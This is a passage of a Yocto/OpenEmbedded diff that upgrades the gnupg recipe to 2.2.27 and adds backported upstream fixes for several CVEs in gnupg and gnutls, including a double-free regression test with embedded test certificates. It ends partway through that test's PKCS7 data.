+@@ -1824,7 +1824,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf",
AC_DEFINE_UNQUOTED(GPGTAR_NAME, "gpgtar", [The name of the gpgtar tool])
diff --git a/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch b/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
index 3e798efd06..a13b4d5fb5 100644
--- a/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
+++ b/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
@@ -1,7 +1,7 @@
-From 9c3858ffda6246bf9e1e6aeeb920532a56b19408 Mon Sep 17 00:00:00 2001
+From 6c75656b68cb6e38b039ae532bd39437cd6daec5 Mon Sep 17 00:00:00 2001
From: Saul Wold <sgw@linux.intel.com>
Date: Wed, 16 Aug 2017 11:18:01 +0800
-Subject: [PATCH 3/4] dirmngr uses libgpg error
+Subject: [PATCH] dirmngr uses libgpg error
Upstream-Status: Pending
Signed-off-by: Saul Wold <sgw@linux.intel.com>
@@ -9,24 +9,20 @@ Signed-off-by: Saul Wold <sgw@linux.intel.com>
Rebase to 2.1.23
Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+
---
- dirmngr/Makefile.am | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
+ dirmngr/Makefile.am | 1 +
+ 1 file changed, 1 insertion(+)
diff --git a/dirmngr/Makefile.am b/dirmngr/Makefile.am
-index b404165..d3f916e 100644
+index 00d3c42..450d873 100644
--- a/dirmngr/Makefile.am
+++ b/dirmngr/Makefile.am
-@@ -82,7 +82,8 @@ endif
- dirmngr_LDADD = $(libcommonpth) \
+@@ -101,6 +101,7 @@ dirmngr_LDADD = $(libcommonpth) \
$(DNSLIBS) $(LIBASSUAN_LIBS) \
$(LIBGCRYPT_LIBS) $(KSBA_LIBS) $(NPTH_LIBS) \
-- $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV)
-+ $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) \
-+ $(GPG_ERROR_LIBS)
+ $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) $(NETLIBS) \
++ $(GPG_ERROR_LIBS) \
+ $(dirmngr_robj)
if USE_LDAP
dirmngr_LDADD += $(ldaplibs)
- endif
---
-1.8.3.1
-
diff --git a/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch b/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch
new file mode 100644
index 0000000000..5992949d35
--- /dev/null
+++ b/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch
@@ -0,0 +1,44 @@
+From 2f05fc96b1332caf97176841b1152da3f0aa16a8 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 22 Jul 2022 17:52:36 +0530
+Subject: [PATCH] CVE-2022-34903
+
+Upstream-Status: Backport [https://git.gnupg.org/cgi-bin/gitweb.cgi?p=gnupg.git;a=commit;h=34c649b3601383cd11dbc76221747ec16fd68e1b]
+CVE: CVE-2022-34903
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ g10/cpr.c | 13 ++++---------
+ 1 file changed, 4 insertions(+), 9 deletions(-)
+
+diff --git a/g10/cpr.c b/g10/cpr.c
+index d502e8b..bc4b715 100644
+--- a/g10/cpr.c
++++ b/g10/cpr.c
+@@ -328,20 +328,15 @@ write_status_text_and_buffer (int no, const char *string,
+ }
+ first = 0;
+ }
+- for (esc=0, s=buffer, n=len; n && !esc; s++, n--)
++ for (esc=0, s=buffer, n=len; n; s++, n--)
+ {
+ if (*s == '%' || *(const byte*)s <= lower_limit
+ || *(const byte*)s == 127 )
+ esc = 1;
+ if (wrap && ++count > wrap)
+- {
+- dowrap=1;
+- break;
+- }
+- }
+- if (esc)
+- {
+- s--; n++;
++ dowrap=1;
++ if (esc || dowrap)
++ break;
+ }
+ if (s != buffer)
+ es_fwrite (buffer, s-buffer, 1, statusfp);
+--
+2.25.1
+
diff --git a/meta/recipes-support/gnupg/gnupg/relocate.patch b/meta/recipes-support/gnupg/gnupg/relocate.patch
index e5a82aa76d..7f7812cd46 100644
--- a/meta/recipes-support/gnupg/gnupg/relocate.patch
+++ b/meta/recipes-support/gnupg/gnupg/relocate.patch
@@ -1,4 +1,4 @@
-From 59c077f32e81190955910cae02599c7a3edfa7fb Mon Sep 17 00:00:00 2001
+From bd66af2ac7bb6d9294ac8055a55462ba7c4f9c9b Mon Sep 17 00:00:00 2001
From: Ross Burton <ross.burton@intel.com>
Date: Wed, 19 Sep 2018 14:44:40 +0100
Subject: [PATCH] Allow the environment to override where gnupg looks for its
@@ -12,10 +12,10 @@ Signed-off-by: Ross Burton <ross.burton@intel.com>
1 file changed, 8 insertions(+), 8 deletions(-)
diff --git a/common/homedir.c b/common/homedir.c
-index e9e75d0..19140aa 100644
+index 4b6e46e..58989b4 100644
--- a/common/homedir.c
+++ b/common/homedir.c
-@@ -760,7 +760,7 @@ gnupg_socketdir (void)
+@@ -763,7 +763,7 @@ gnupg_socketdir (void)
if (!name)
{
unsigned int dummy;
@@ -24,7 +24,7 @@ index e9e75d0..19140aa 100644
}
return name;
-@@ -786,7 +786,7 @@ gnupg_sysconfdir (void)
+@@ -789,7 +789,7 @@ gnupg_sysconfdir (void)
}
return name;
#else /*!HAVE_W32_SYSTEM*/
@@ -33,7 +33,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -815,7 +815,7 @@ gnupg_bindir (void)
+@@ -818,7 +818,7 @@ gnupg_bindir (void)
else
return rdir;
#else /*!HAVE_W32_SYSTEM*/
@@ -42,7 +42,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -828,7 +828,7 @@ gnupg_libexecdir (void)
+@@ -831,7 +831,7 @@ gnupg_libexecdir (void)
#ifdef HAVE_W32_SYSTEM
return gnupg_bindir ();
#else /*!HAVE_W32_SYSTEM*/
@@ -51,7 +51,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -842,7 +842,7 @@ gnupg_libdir (void)
+@@ -845,7 +845,7 @@ gnupg_libdir (void)
name = xstrconcat (w32_rootdir (), DIRSEP_S "lib" DIRSEP_S "gnupg", NULL);
return name;
#else /*!HAVE_W32_SYSTEM*/
@@ -60,7 +60,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -856,7 +856,7 @@ gnupg_datadir (void)
+@@ -859,7 +859,7 @@ gnupg_datadir (void)
name = xstrconcat (w32_rootdir (), DIRSEP_S "share" DIRSEP_S "gnupg", NULL);
return name;
#else /*!HAVE_W32_SYSTEM*/
@@ -69,7 +69,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -872,7 +872,7 @@ gnupg_localedir (void)
+@@ -875,7 +875,7 @@ gnupg_localedir (void)
NULL);
return name;
#else /*!HAVE_W32_SYSTEM*/
@@ -78,7 +78,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -940,7 +940,7 @@ gnupg_cachedir (void)
+@@ -943,7 +943,7 @@ gnupg_cachedir (void)
}
return dir;
#else /*!HAVE_W32_SYSTEM*/
diff --git a/meta/recipes-support/gnupg/gnupg_2.2.20.bb b/meta/recipes-support/gnupg/gnupg_2.2.27.bb
index f754573c88..bd09b02017 100644
--- a/meta/recipes-support/gnupg/gnupg_2.2.20.bb
+++ b/meta/recipes-support/gnupg/gnupg_2.2.27.bb
@@ -1,4 +1,9 @@
SUMMARY = "GNU Privacy Guard - encryption and signing tools (2.x)"
+DESCRIPTION = "A complete and free implementation of the OpenPGP standard \
+as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt \
+and sign your data and communications; it features a versatile key \
+management system, along with access modules for all kinds of public \
+key directories."
HOMEPAGE = "http://www.gnupg.org/"
LICENSE = "GPLv3 & LGPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=189af8afca6d6075ba6c9e0aa8077626 \
@@ -15,19 +20,20 @@ SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
file://0003-dirmngr-uses-libgpg-error.patch \
file://0004-autogen.sh-fix-find-version-for-beta-checking.patch \
file://0001-Woverride-init-is-not-needed-with-gcc-9.patch \
+ file://CVE-2022-34903.patch \
"
SRC_URI_append_class-native = " file://0001-configure.ac-use-a-custom-value-for-the-location-of-.patch \
file://relocate.patch"
SRC_URI_append_class-nativesdk = " file://relocate.patch"
-SRC_URI[md5sum] = "4ff88920cf52b35db0dedaee87bdbbb1"
-SRC_URI[sha256sum] = "04a7c9d48b74c399168ee8270e548588ddbe52218c337703d7f06373d326ca30"
+SRC_URI[sha256sum] = "34e60009014ea16402069136e0a5f63d9b65f90096244975db5cea74b3d02399"
EXTRA_OECONF = "--disable-ldap \
--disable-ccid-driver \
--with-zlib=${STAGING_LIBDIR}/.. \
--with-bzip2=${STAGING_LIBDIR}/.. \
--with-readline=${STAGING_LIBDIR}/.. \
+ --with-mailprog=${sbindir}/sendmail \
--enable-gpg-is-gpg2 \
"
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch
new file mode 100644
index 0000000000..6fe7a21e33
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch
@@ -0,0 +1,67 @@
+From 15beb4b193b2714d88107e7dffca781798684e7e Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Fri, 29 Jan 2021 14:06:32 +0100
+Subject: [PATCH] key_share: avoid use-after-free around realloc
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/15beb4b193b2714d88107e7dffca781798684e7e
+Upstream-Status: Backport
+CVE: CVE-2021-20231
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/ext/key_share.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/lib/ext/key_share.c b/lib/ext/key_share.c
+index ab8abf8fe6..a8c4bb5cff 100644
+--- a/lib/ext/key_share.c
++++ b/lib/ext/key_share.c
+@@ -664,14 +664,14 @@ key_share_send_params(gnutls_session_t session,
+ {
+ unsigned i;
+ int ret;
+- unsigned char *lengthp;
+- unsigned int cur_length;
+ unsigned int generated = 0;
+ const gnutls_group_entry_st *group;
+ const version_entry_st *ver;
+
+ /* this extension is only being sent on client side */
+ if (session->security_parameters.entity == GNUTLS_CLIENT) {
++ unsigned int length_pos;
++
+ ver = _gnutls_version_max(session);
+ if (unlikely(ver == NULL || ver->key_shares == 0))
+ return 0;
+@@ -679,16 +679,13 @@ key_share_send_params(gnutls_session_t session,
+ if (!have_creds_for_tls13(session))
+ return 0;
+
+- /* write the total length later */
+- lengthp = &extdata->data[extdata->length];
++ length_pos = extdata->length;
+
+ ret =
+ _gnutls_buffer_append_prefix(extdata, 16, 0);
+ if (ret < 0)
+ return gnutls_assert_val(ret);
+
+- cur_length = extdata->length;
+-
+ if (session->internals.hsk_flags & HSK_HRR_RECEIVED) { /* we know the group */
+ group = get_group(session);
+ if (unlikely(group == NULL))
+@@ -736,7 +733,8 @@ key_share_send_params(gnutls_session_t session,
+ }
+
+ /* copy actual length */
+- _gnutls_write_uint16(extdata->length - cur_length, lengthp);
++ _gnutls_write_uint16(extdata->length - length_pos - 2,
++ &extdata->data[length_pos]);
+
+ } else { /* server */
+ ver = get_version(session);
+--
+GitLab
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch
new file mode 100644
index 0000000000..e13917cddb
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch
@@ -0,0 +1,65 @@
+From 75a937d97f4fefc6f9b08e3791f151445f551cb3 Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Fri, 29 Jan 2021 14:06:50 +0100
+Subject: [PATCH] pre_shared_key: avoid use-after-free around realloc
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/75a937d97f4fefc6f9b08e3791f151445f551cb3
+Upstream-Status: Backport
+CVE: CVE-2021-20232
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/ext/pre_shared_key.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/lib/ext/pre_shared_key.c b/lib/ext/pre_shared_key.c
+index a042c6488e..380bf39ed5 100644
+--- a/lib/ext/pre_shared_key.c
++++ b/lib/ext/pre_shared_key.c
+@@ -267,7 +267,7 @@ client_send_params(gnutls_session_t session,
+ size_t spos;
+ gnutls_datum_t username = {NULL, 0};
+ gnutls_datum_t user_key = {NULL, 0}, rkey = {NULL, 0};
+- gnutls_datum_t client_hello;
++ unsigned client_hello_len;
+ unsigned next_idx;
+ const mac_entry_st *prf_res = NULL;
+ const mac_entry_st *prf_psk = NULL;
+@@ -428,8 +428,7 @@ client_send_params(gnutls_session_t session,
+ assert(extdata->length >= sizeof(mbuffer_st));
+ assert(ext_offset >= (ssize_t)sizeof(mbuffer_st));
+ ext_offset -= sizeof(mbuffer_st);
+- client_hello.data = extdata->data+sizeof(mbuffer_st);
+- client_hello.size = extdata->length-sizeof(mbuffer_st);
++ client_hello_len = extdata->length-sizeof(mbuffer_st);
+
+ next_idx = 0;
+
+@@ -440,6 +439,11 @@ client_send_params(gnutls_session_t session,
+ }
+
+ if (prf_res && rkey.size > 0) {
++ gnutls_datum_t client_hello;
++
++ client_hello.data = extdata->data+sizeof(mbuffer_st);
++ client_hello.size = client_hello_len;
++
+ ret = compute_psk_binder(session, prf_res,
+ binders_len, binders_pos,
+ ext_offset, &rkey, &client_hello, 1,
+@@ -474,6 +478,11 @@ client_send_params(gnutls_session_t session,
+ }
+
+ if (prf_psk && user_key.size > 0 && info) {
++ gnutls_datum_t client_hello;
++
++ client_hello.data = extdata->data+sizeof(mbuffer_st);
++ client_hello.size = client_hello_len;
++
+ ret = compute_psk_binder(session, prf_psk,
+ binders_len, binders_pos,
+ ext_offset, &user_key, &client_hello, 0,
+--
+GitLab
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch
new file mode 100644
index 0000000000..0bcb55e573
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch
@@ -0,0 +1,37 @@
+From 3db352734472d851318944db13be73da61300568 Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Wed, 22 Dec 2021 09:12:25 +0100
+Subject: [PATCH] wrap_nettle_hash_fast: avoid calling _update with zero-length
+ input
+
+As Nettle's hash update functions internally call memcpy, providing
+zero-length input may cause undefined behavior.
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568
+Upstream-Status: Backport
+CVE: CVE-2021-4209
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/nettle/mac.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/lib/nettle/mac.c b/lib/nettle/mac.c
+index f9d4d7a8df..35e070fab0 100644
+--- a/lib/nettle/mac.c
++++ b/lib/nettle/mac.c
+@@ -788,7 +788,9 @@ static int wrap_nettle_hash_fast(gnutls_digest_algorithm_t algo,
+ if (ret < 0)
+ return gnutls_assert_val(ret);
+
+- ctx.update(&ctx, text_size, text);
++ if (text_size > 0) {
++ ctx.update(&ctx, text_size, text);
++ }
+ ctx.digest(&ctx, ctx.length, digest);
+
+ return 0;
+--
+GitLab
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch b/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch
new file mode 100644
index 0000000000..f8954945d0
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch
@@ -0,0 +1,282 @@
+From 9835638d4e1f37781a47e777c76d5bb14218929b Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 16 Aug 2022 12:23:14 +0530
+Subject: [PATCH] CVE-2022-2509
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/ce37f9eb265dbe9b6d597f5767449e8ee95848e2]
+CVE: CVE-2022-2509
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ NEWS | 4 +
+ lib/x509/pkcs7.c | 3 +-
+ tests/Makefile.am | 2 +-
+ tests/pkcs7-verify-double-free.c | 215 +++++++++++++++++++++++++++++++
+ 4 files changed, 222 insertions(+), 2 deletions(-)
+ create mode 100644 tests/pkcs7-verify-double-free.c
+
+diff --git a/NEWS b/NEWS
+index 755a67c..ba70bb3 100644
+--- a/NEWS
++++ b/NEWS
+@@ -7,6 +7,10 @@ See the end for copying conditions.
+
+ * Version 3.6.14 (released 2020-06-03)
+
++** libgnutls: Fixed double free during verification of pkcs7 signatures.
++ Reported by Jaak Ristioja (#1383). [GNUTLS-SA-2022-07-07, CVSS: medium]
++ [CVE-2022-2509]
++
+ ** libgnutls: Fixed insecure session ticket key construction, since 3.6.4.
+ The TLS server would not bind the session ticket encryption key with a
+ value supplied by the application until the initial key rotation, allowing
+diff --git a/lib/x509/pkcs7.c b/lib/x509/pkcs7.c
+index 98669e8..ccbc69d 100644
+--- a/lib/x509/pkcs7.c
++++ b/lib/x509/pkcs7.c
+@@ -1318,7 +1318,8 @@ gnutls_x509_crt_t find_signer(gnutls_pkcs7_t pkcs7, gnutls_x509_trust_list_t tl,
+ issuer = find_verified_issuer_of(pkcs7, issuer, purpose, vflags);
+
+ if (issuer != NULL && gnutls_x509_crt_check_issuer(issuer, issuer)) {
+- if (prev) gnutls_x509_crt_deinit(prev);
++ if (prev && prev != signer)
++ gnutls_x509_crt_deinit(prev);
+ prev = issuer;
+ break;
+ }
+diff --git a/tests/Makefile.am b/tests/Makefile.am
+index 11a083c..cd43a0f 100644
+--- a/tests/Makefile.am
++++ b/tests/Makefile.am
+@@ -219,7 +219,7 @@ ctests += mini-record-2 simple gnutls_hmac_fast set_pkcs12_cred cert certuniquei
+ tls-record-size-limit-asym dh-compute ecdh-compute sign-verify-data-newapi \
+ sign-verify-newapi sign-verify-deterministic iov aead-cipher-vec \
+ tls13-without-timeout-func buffer status-request-revoked \
+- set_x509_ocsp_multi_cli kdf-api keylog-func \
++ set_x509_ocsp_multi_cli kdf-api keylog-func pkcs7-verify-double-free \
+ dtls_hello_random_value tls_hello_random_value x509cert-dntypes
+
+ if HAVE_SECCOMP_TESTS
+diff --git a/tests/pkcs7-verify-double-free.c b/tests/pkcs7-verify-double-free.c
+new file mode 100644
+index 0000000..fadf307
+--- /dev/null
++++ b/tests/pkcs7-verify-double-free.c
+@@ -0,0 +1,215 @@
++/*
++ * Copyright (C) 2022 Red Hat, Inc.
++ *
++ * Author: Zoltan Fridrich
++ *
++ * This file is part of GnuTLS.
++ *
++ * GnuTLS is free software: you can redistribute it and/or modify it
++ * under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GnuTLS is distributed in the hope that it will be useful, but
++ * WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ * General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GnuTLS. If not, see <https://www.gnu.org/licenses/>.
++ */
++
++#ifdef HAVE_CONFIG_H
++#include <config.h>
++#endif
++
++#include <stdio.h>
++#include <gnutls/pkcs7.h>
++#include <gnutls/x509.h>
++
++#include "utils.h"
++
++static char rca_pem[] =
++ "-----BEGIN CERTIFICATE-----\n"
++ "MIIDCjCCAfKgAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQKDApFeGFt\n"
++ "cGxlIENBMCAXDTE3MDcyMTE0NDMzNloYDzIyMjIwNzIxMTQ0MzM2WjAVMRMwEQYD\n"
++ "VQQKDApFeGFtcGxlIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA\n"
++ "v8hnKPJ/IA0SQB/A/a0Uh+npZ67vsgIMrtTQo0r0kJkmkBz5323xO3DVuJfB3QmX\n"
++ "v9zvoeCQLuDvWar5Aixfxgm6s5Q+yPvJj9t3NebDrU+Y4+qyewBIJUF8EF/5iBPC\n"
++ "ZHONmzbfIRWvQWGGgb2CRcOHp2J7AY/QLB6LsWPaLjs/DHva28Q13JaTTHIpdu8v\n"
++ "t6vHr0nXf66DN4MvtoF3N+o+v3snJCMsfXOqASi4tbWR7gtOfCfiz9uBjh0W2Dut\n"
++ "/jclBQkJkLe6esNSM+f4YiOpctVDjmfj8yoHCp394vt0wFqhG38wsTFAyVP6qIcf\n"
++ "5zoSu9ovEt2cTkhnZHjiiwIDAQABo2MwYTAPBgNVHRMBAf8EBTADAQH/MA4GA1Ud\n"
++ "DwEB/wQEAwIBBjAdBgNVHQ4EFgQUhjeO6Uc5imbjOl2I2ltVA27Hu9YwHwYDVR0j\n"
++ "BBgwFoAUhjeO6Uc5imbjOl2I2ltVA27Hu9YwDQYJKoZIhvcNAQELBQADggEBAD+r\n"
++ "i/7FsbG0OFKGF2+JOnth6NjJQcMfM8LiglqAuBUijrv7vltoZ0Z3FJH1Vi4OeMXn\n"
++ "l7X/9tWUve0uFl75MfjDrf0+lCEdYRY1LCba2BrUgpbbkLywVUdnbsvndehegCgS\n"
++ "jss2/zys3Hlo3ZaHlTMQ/NQ4nrxcxkjOvkZSEOqgxJTLpzm6pr7YUts4k6c6lNiB\n"
++ "FSiJiDzsJCmWR9C3fBbUlfDfTJYGN3JwqX270KchXDElo8gNoDnF7jBMpLFFSEKm\n"
++ "MyfbNLX/srh+CEfZaN/OZV4A3MQ0L8vQEp6M4CJhvRLIuMVabZ2coJ0AzystrOMU\n"
++ "LirBWjg89RoAjFQ7bTE=\n"
++ "-----END CERTIFICATE-----\n";
++
++static char ca_pem[] =
++ "-----BEGIN CERTIFICATE-----\n"
++ "MIIDFzCCAf+gAwIBAgIBAjANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQKDApFeGFt\n"
++ "cGxlIENBMCAXDTE3MDcyMTE0NDQzNFoYDzIyMjIwNzIxMTQ0NDM0WjAiMSAwHgYD\n"
++ "VQQKDBdFeGFtcGxlIGludGVybWVkaWF0ZSBDQTCCASIwDQYJKoZIhvcNAQEBBQAD\n"
++ "ggEPADCCAQoCggEBAKb9ACB8u//sP6MfNU1OsVw68xz3eTPLgKxS0vpqexm6iGVg\n"
++ "ug/o9uYRLzqiEukv/eyz9WzHmY7sqlOJjOFdv92+SaNg79Jc51WHPFXgea4/qyfr\n"
++ "4y14PGs0SNxm6T44sXurUs7cXydQVUgnq2VCaWFOTUdxXoAWkV8r8GaUoPD/klVz\n"
++ "RqxSZVETmX1XBKhsMnnov41kRwVph2C+VfUspsbaUZaz/o/S1/nokhXRACzKsMBr\n"
++ "obqiGxbY35uVzsmbAW5ErhQz98AWJL3Bub1fsEMXg6OEMmPH4AtX888dTIYZNw0E\n"
++ "bUIESspz1kjJQTtVQDHTprhwz16YiSVeUonlLgMCAwEAAaNjMGEwDwYDVR0TAQH/\n"
++ "BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFPBjxDWjMhjXERirKF9O\n"
++ "o/5Cllc5MB8GA1UdIwQYMBaAFIY3julHOYpm4zpdiNpbVQNux7vWMA0GCSqGSIb3\n"
++ "DQEBCwUAA4IBAQCTm+vv3hBa6lL5IT+Fw8aTxQ2Ne7mZ5oyazhvXYwwfKNMX3SML\n"
++ "W2JdPaL64ZwbxxxYvW401o5Z0CEgru3YFrsqB/hEdl0Uf8UWWJmE1rRa+miTmbjt\n"
++ "lrLNCWdrs6CiwvsPITTHg7jevB4KyZYsTSxQFcyr3N3xF+6EmOTC4IkhPPnXYXcp\n"
++ "248ih+WOavSYoRvzgB/Dip1WnPYU2mfIV3O8JReRryngA0TzWCLPLUoWR3R4jwtC\n"
++ "+1uSLoqaenz3qv3F1WEbke37az9YJuXx/5D8CqFQiZ62TUUtI6fYd8mkMBM4Qfh6\n"
++ "NW9XrCkI9wlpL5K9HllhuW0BhKeJkuPpyQ2p\n"
++ "-----END CERTIFICATE-----\n";
++
++static char ee_pem[] =
++ "-----BEGIN CERTIFICATE-----\n"
++ "MIIDIjCCAgqgAwIBAgIBATANBgkqhkiG9w0BAQsFADAiMSAwHgYDVQQKDBdFeGFt\n"
++ "cGxlIGludGVybWVkaWF0ZSBDQTAgFw0yMjA3MjExNDQ1MzdaGA8yMjIyMDcyMTE0\n"
++ "NDUzN1owFTETMBEGA1UEAwwKSm9obiBTbWl0aDCCASIwDQYJKoZIhvcNAQEBBQAD\n"
++ "ggEPADCCAQoCggEBAMb1uuxppBFY+WVD45iyHUq7DkIJNNOI/JRaybVJfPktWq2E\n"
++ "eNe7XhV05KKnqZTbDO2iYqNHqGhZ8pz/IstDRTZP3z/q1vXTG0P9Gx28rEy5TaUY\n"
++ "QjtD+ZoFUQm0ORMDBjd8jikqtJ87hKeuOPMH4rzdydotMaPQSm7KLzHBGBr6gg7z\n"
++ "g1IxPWkhMyHapoMqqrhjwjzoTY97UIXpZTEoIA+KpEC8f9CciBtL0i1MPBjWozB6\n"
++ "Jma9q5iEwZXuRr3cnPYeIPlK2drgDZCMuSFcYiT8ApLw5OhKqY1m2EvfZ2ox2s9R\n"
++ "68/HzYdPi3kZwiNEtlBvMlpt5yKBJAflp76d7DkCAwEAAaNuMGwwCwYDVR0PBAQD\n"
++ "AgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDBDAdBgNVHQ4EFgQUc+Mi\n"
++ "kr8WMCk00SQo+P2iggp/oQkwHwYDVR0jBBgwFoAU8GPENaMyGNcRGKsoX06j/kKW\n"
++ "VzkwDQYJKoZIhvcNAQELBQADggEBAKU9+CUR0Jcfybd1+8Aqgh1RH96yQygnVuyt\n"
++ "Na9rFz4fM3ij9tGXDHXrkZw8bW1dWLU9quu8zeTxKxc3aiDIw739Alz0tukttDo7\n"
++ "dW7YqIb77zsIsWB9p7G9dlxT6ieUy+5IKk69BbeK8KR0vAciAG4KVQxPhuPy/LGX\n"
++ "PzqlJIJ4h61s3UOroReHPB1keLZgpORqrvtpClOmABH9TLFRJA/WFg8Q2XYB/p0x\n"
++ "l/pWiaoBC+8wK9cDoMUK5yOwXeuCLffCb+UlAD0+z/qxJ2pisE8E9X8rRKRrWI+i\n"
++ "G7LtJCEn86EQK8KuRlJxKgj8lClZhoULB0oL4jbblBuNow9WRmM=\n"
++ "-----END CERTIFICATE-----\n";
++
++static char msg_pem[] =
++ "-----BEGIN PKCS7-----\n"
++ "MIIK2QYJKoZIhvcNAQcCoIIKyjCCCsYCAQExDTALBglghkgBZQMEAgEwCwYJKoZI\n"
++ "hvcNAQcBoIIJTzCCAwowggHyoAMCAQICAQEwDQYJKoZIhvcNAQELBQAwFTETMBEG\n"
++ "A1UECgwKRXhhbXBsZSBDQTAgFw0xNzA3MjExNDQzMjFaGA8yMjIyMDcyMTE0NDMy\n"
++ "MVowFTETMBEGA1UECgwKRXhhbXBsZSBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEP\n"
++ "ADCCAQoCggEBAL51eyE4j8wAKQKMGlO9HEY2iaGvsdPSJmidSdmCi1jnNK39Lx4Y\n"
++ "31h279hSHF5wtI6VM91HHfeLf1mjEZHlKrXXJQzBPLpbHWapD778drHBitOP8e56\n"
++ "fDMIfofLV4tkMk8690vPe4cJH1UHGspMyz6EQF9kPRaW80XtMV/6dalgL/9Esmaw\n"
++ "XBNPJAS1VutDuXQkJ/3/rWFLmkpYHHtGPjX782YRmT1s+VOVTsLqmKx0TEL8A381\n"
++ "bbElHPUAMjPcyWR5qqA8KWnS5Dwqk3LwI0AvuhQytCq0S7Xl4DXauvxwTRXv0UU7\n"
++ "W8r3MLAw9DnlnJiD/RFjw5rbGO3wMePk/qUCAwEAAaNjMGEwDwYDVR0TAQH/BAUw\n"
++ "AwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFIh2KRoKJoe2VtpOwWMkRAkR\n"
++ "mLWKMB8GA1UdIwQYMBaAFIh2KRoKJoe2VtpOwWMkRAkRmLWKMA0GCSqGSIb3DQEB\n"
++ "CwUAA4IBAQBovvlOjoy0MCT5U0eWfcPQQjY4Ssrn3IiPNlVkqSNo+FHX+2baTLVQ\n"
++ "5QTHxwXwzdIJiwtjFWDdGEQXqmuIvnFG+u/whGbeg6oQygfnQ5Y+q6epOxCsPgLQ\n"
++ "mKKEaF7mvh8DauUx4QSbYCNGCctOZuB1vlN9bJ3/5QbH+2pFPOfCr5CAyPDwHo6S\n"
++ "qO3yPcutRwT9xS7gXEHM9HhLp+DmdCGh4eVBPiFilyZm1d92lWxU8oxoSfXgzDT/\n"
++ "GCzlMykNZNs4JD9QmiRClP/3U0dQbOhah/Fda+N+L90xaqEgGcvwKKZa3pzo59pl\n"
